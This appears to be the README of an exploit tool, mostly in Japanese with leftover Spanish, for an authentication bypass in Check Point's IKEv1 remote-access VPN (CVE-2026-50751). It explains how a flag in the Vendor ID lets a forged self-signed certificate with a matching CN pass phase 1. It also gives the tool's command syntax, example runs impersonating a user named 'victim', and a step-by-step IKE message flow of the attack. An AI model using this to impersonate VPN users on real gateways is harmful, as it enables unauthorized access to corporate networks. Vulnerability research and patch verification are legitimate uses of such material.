
Check PointのRemote-Access VPN(IKEv1)における証明書認証のバイパス。
Check Point の Remote-Access VPN (IKEv1) における証明書認証バイパス。
CVE-2026-50751 は Check Point の iked デーモンに存在する認証バイパスであり、hotfix sk185033 が適用されていない R81.10、R82、R82.10 に存在します。この脆弱性により、プロビジョニングされた任意の Remote Access ユーザーとして、秘密鍵・パスワード・有効な証明書なしで認証することが可能になります。
脆弱な iked は Vendor ID VPNExtFeatures (ビット 0x4) からフラグを読み取り、それが有効な場合に verify_peer_auth / verifyMessagePhase1 を省略します。その結果:
証明書の署名(所持証明)が検証されない。
信頼チェーンが検証されない。
subject DN がプロビジョニングされたユーザーに解決されることのみが確認される。
CN= が対象ユーザーと一致する自己署名証明書を偽造し、無効な署名とともに送信するだけで十分です。ゲートウェイがフェーズ 1 を受け入れた場合、そのユーザーとして認証されたことになります(ISAKMP SA はその DN の下に保存されます)。
これは IKE (UDP 500/4500) 上および Visitor Mode (TCPT, TCP 443) 上で動作します。
構文
cve-2026-50751 -host <IP|hostname> -user <username> [opciones]
| Flag | 説明 | デフォルト |
|---|
-host | ゲートウェイの IP または hostname (必須) | — |
-user | なりすます RA ユーザー名 (必須) | — |
-port | ポート: 500、4500 (UDP) または 443 (TCPT) | 500 |
-org | ICA の組織 (O=)。省略した場合、TLS 証明書から導出される | — |
-ou | ユーザーの組織単位 (OU=) | users |
-timeout | 操作ごとのタイムアウト | 6s |
-retries | msg1 の再試行回数 | 1 |
-v | 詳細出力 | false |
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v
Atacante Gateway (iked vulnerable)
│ │
│─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (bit 0x4) ───▶│
│ │ Lee flag 0x4
│ │ Marca verify_peer_auth = skip
│◀── msg2: SA aceptado ────────────────────────────────────│
│ │
│─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
│◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
│ │
│ Deriva SKEYID, SKEYID_e, IV │
│ │
│─── msg5 (cifrado): ID=DN forjado + CERT autofirmado │
│ + firma aleatoria ───────────────────▶│
│ │ Omite verificación
│ │ de firma
│ │ Resuelve DN → usuario
│◀── msg6 (cifrado): SA establecida ───────────────────────│
│ │
│ Descifra msg6 con SKEYID_e → prueba de autenticación │